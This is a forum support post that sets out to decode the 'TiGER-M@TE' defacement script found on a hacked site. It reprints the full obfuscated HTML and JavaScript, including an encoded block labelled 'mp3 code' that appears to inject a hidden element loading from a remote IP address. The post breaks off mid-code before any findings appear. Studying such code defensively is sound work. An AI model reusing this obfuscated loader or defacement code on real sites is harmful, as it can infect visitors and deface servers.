What does the TiGER-M@TE hack file actually do?

Support Documentation in response the September 25, 2011 TiGER-M@TE hack

Moderator: Ilbin

What does the TiGER-M@TE hack file actually do?

Postby bradm on Thu Sep 29, 2011 2:34 pm

We've received several updates from users stating that they believe the hacked TiGER-M@te script attempted to install a virus on their local machine. In this post we'll attempt to debug the code and see what is actually occurring.

The following pages were using in decoding the text in the script:
http://home2.paulschou.net/tools/xlate/
http://www.silisoftware.com/tools/entitydecode.php

Starting off, here's the actual code:
Code: Select all
<html><head>
<title>HackeD By TiGER-M@TE</title></head>
<style>
body { scrollbar-track-color: #000000;scrollbar-darkshadow-color: #000000; scrollbar-face-color: #000000; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #000000;  scrollbar-arrow-color: #FFFFFF; color:#8E959E }
.name { text-decoration: none;}
</style><script>var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x73\x63\x72\x6F\x6C\x6C\x42\x79","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x72\x65\x73\x69\x7A\x65\x54\x6F","\x6D\x6F\x76\x65\x54\x6F","\x6D\x6F\x76\x65\x28\x29","\x72\x6F\x75\x6E\x64","\x66\x67\x43\x6F\x6C\x6F\x72","\x62\x67\x43\x6F\x6C\x6F\x72","\x4C\x4F\x4C","\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68","\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74"];function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} ;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c<0){status=8;} ;} ;if(status==4){c=c+16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;</script><body bgcolor="#000000" oncontextmenu="return false;"><p align="center"><span style="font-weight: 700;"><font face="Tahoma" size="5" color="#EEEEEE"><i>Server HackeD<br/><br/>By</i> </font><br/><br/><a href="#" class="name"><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script><i onclick="details()">TiGER-M@TE</i></font></a></span><br/><br/><script>var l1n3='<img src="data:image/gif;base64,R0lGODlhqAABAOYAAAMDA3d4eAAAAAICAfLy8l5dXaWlpSQlJBwcHBQVFBISEQ0NDbu7u/v8/EJBQePj4/3+/T4+PtjX2Do7OlZWVyEiIjc3N09PT4OEhIB/f/r6+sjIyMTExPb29rS0tHx7fOvr64+Pj4eHh56dnZqZmvT09GVlZejp6dXU1aGhoeXm5khISJKTk93e3hkZGQcHB0RFRBcXF+7u7isqKi4uLmxtbLe3t6ysrXR0dTQ0M87Ozw8QEMvLy6ipqQUFBUxMTAkJCdHS0vDw73BwcQsLCycnJ/j4+JeXl8HBwmFhYVNSU+Dg4Glpadvb2jEwML6+vrCvsB8fH4uLi1pZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAACoAAEAAAewgBANGkYdJQRCMiAnKg9LLU0SKEE6PBscSE8MNh5QNz0GKSMkRywhUiIYGR8BOEM1TCZJBVMUShc/KzAOERMWOU40M0UHFVEILjEJCjsLREAvPgADAgIDAD4vQEQLOwoJMS4IURUHRTM0TjkWExEOMCs/F0oUUwVJJkw1QzgBHxkYREgJweIIiREpDPS4AcWDDQZPkHDYwENHEBQSmrRY8kDFCRAyhBAo0cGIhgYQAgEAOw==" />';
document.write(l1n3+l1n3);</script></br/><br/><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script>#Bangladeshi HackeR</font><br/><br/><br/>
<script>var _0x9355=["\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x6F\x74\x6F\x6E\x6F\x6E\x73\x2E\x72\x75\x2F\x69\x6D\x61\x67\x65\x73\x2F\x31\x37\x2E\x30\x33\x2E\x31\x31\x2F\x62\x79\x74\x69\x67\x65\x72\x6D\x74\x65\x2E\x6A\x70\x67\x22\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x74\x68\x69\x73\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x6E\x75\x6C\x6C\x3B\x74\x68\x69\x73\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x61\x67\x65\x2E\x62\x61\x79\x69\x6D\x67\x2E\x63\x6F\x6D\x2F\x6D\x61\x65\x61\x64\x61\x61\x64\x69\x2E\x6A\x70\x67\x27\x3B\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65"];if(document[_0x9355[0]]!=_0x9355[1]){exit(0);} ;document[_0x9355[3]](_0x9355[2]);</script>
<br/><br/><br/><font face="Lucida Console" size="5" color="#FFFFFF" weight="bold">Greetz :</font> <font color="#FF0000" size="4"><b>aBu.HaLiL501</b></font> ; <font color="#FF0000" size="4"><b>w7sh.syria</b></font> ; <font color="#FF0000" size="4"><b>Sy-Hacker</b></font> ; <font color="#FF0000" size="4"><b>NmR.Hacker</b></font> ; <font color="#FF0000" size="4"><b>Wa7sh Hacker</b></font> ; <font color="#FF0000" size="4"><b>h311 c0d3</b></font></p><p style="border: solid 10px #242424; padding: 15px; text-align:center; -moz-border-radius: 15px; -khtml-border-radius: 15px; -webkit-border-radius: 15px; border-radius: 15px; margin: 0;"><span style="font-weight: 700;"><font face="Tahoma" size="1" color="#FF0000"><i><font color="white" weight"bold">#</font>TiGER-M@TE<br/>#<font color="white" weight="bold">localhost_80@hotmail.com</font><br/><font color="white" weight"bold"></font><font color="yellow">&#169;UNDERGROUND HACKERS  2007 - 2011 </font></i><br/><br/><font size="3">#EOF</font></font></span></p></body>

<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">var _0xd8af=["\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45","\x77\x72\x69\x74\x65","\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33"];document[_0xd8af[1]](unescape(_0xd8af[0]));dF(_0xd8af[2]);</script>

<!-- mp3 code ended -->

</html>







The first thing we'll do is strip out any standard html code, which leaves us with this:

Code: Select all
<script>var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x73\x63\x72\x6F\x6C\x6C\x42\x79","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x72\x65\x73\x69\x7A\x65\x54\x6F","\x6D\x6F\x76\x65\x54\x6F","\x6D\x6F\x76\x65\x28\x29","\x72\x6F\x75\x6E\x64","\x66\x67\x43\x6F\x6C\x6F\x72","\x62\x67\x43\x6F\x6C\x6F\x72","\x4C\x4F\x4C","\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68","\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74"];function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} ;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c<0){status=8;} ;} ;if(status==4){c=c+16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;</script><body bgcolor="#000000" oncontextmenu="return false;"><p align="center"><span style="font-weight: 700;"><font face="Tahoma" size="5" color="#EEEEEE"><i>Server HackeD<br/><br/>By</i> </font><br/><br/><a href="#" class="name"><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script><script>var l1n3='<img src="data:image/gif;base64,R0lGODlhqAABAOYAAAMDA3d4eAAAAAICAfLy8l5dXaWlpSQlJBwcHBQVFBISEQ0NDbu7u/v8/EJBQePj4/3+/T4+PtjX2Do7OlZWVyEiIjc3N09PT4OEhIB/f/r6+sjIyMTExPb29rS0tHx7fOvr64+Pj4eHh56dnZqZmvT09GVlZejp6dXU1aGhoeXm5khISJKTk93e3hkZGQcHB0RFRBcXF+7u7isqKi4uLmxtbLe3t6ysrXR0dTQ0M87Ozw8QEMvLy6ipqQUFBUxMTAkJCdHS0vDw73BwcQsLCycnJ/j4+JeXl8HBwmFhYVNSU+Dg4Glpadvb2jEwML6+vrCvsB8fH4uLi1pZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAACoAAEAAAewgBANGkYdJQRCMiAnKg9LLU0SKEE6PBscSE8MNh5QNz0GKSMkRywhUiIYGR8BOEM1TCZJBVMUShc/KzAOERMWOU40M0UHFVEILjEJCjsLREAvPgADAgIDAD4vQEQLOwoJMS4IURUHRTM0TjkWExEOMCs/F0oUUwVJJkw1QzgBHxkYREgJweIIiREpDPS4AcWDDQZPkHDYwENHEBQSmrRY8kDFCRAyhBAo0cGIhgYQAgEAOw==" />';
document.write(l1n3+l1n3);</script></br/><br/><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script>
<script>var _0x9355=["\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x6F\x74\x6F\x6E\x6F\x6E\x73\x2E\x72\x75\x2F\x69\x6D\x61\x67\x65\x73\x2F\x31\x37\x2E\x30\x33\x2E\x31\x31\x2F\x62\x79\x74\x69\x67\x65\x72\x6D\x74\x65\x2E\x6A\x70\x67\x22\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x74\x68\x69\x73\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x6E\x75\x6C\x6C\x3B\x74\x68\x69\x73\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x61\x67\x65\x2E\x62\x61\x79\x69\x6D\x67\x2E\x63\x6F\x6D\x2F\x6D\x61\x65\x61\x64\x61\x61\x64\x69\x2E\x6A\x70\x67\x27\x3B\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65"];if(document[_0x9355[0]]!=_0x9355[1]){exit(0);} ;document[_0x9355[3]](_0x9355[2]);</script>

<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">var _0xd8af=["\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45","\x77\x72\x69\x74\x65","\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\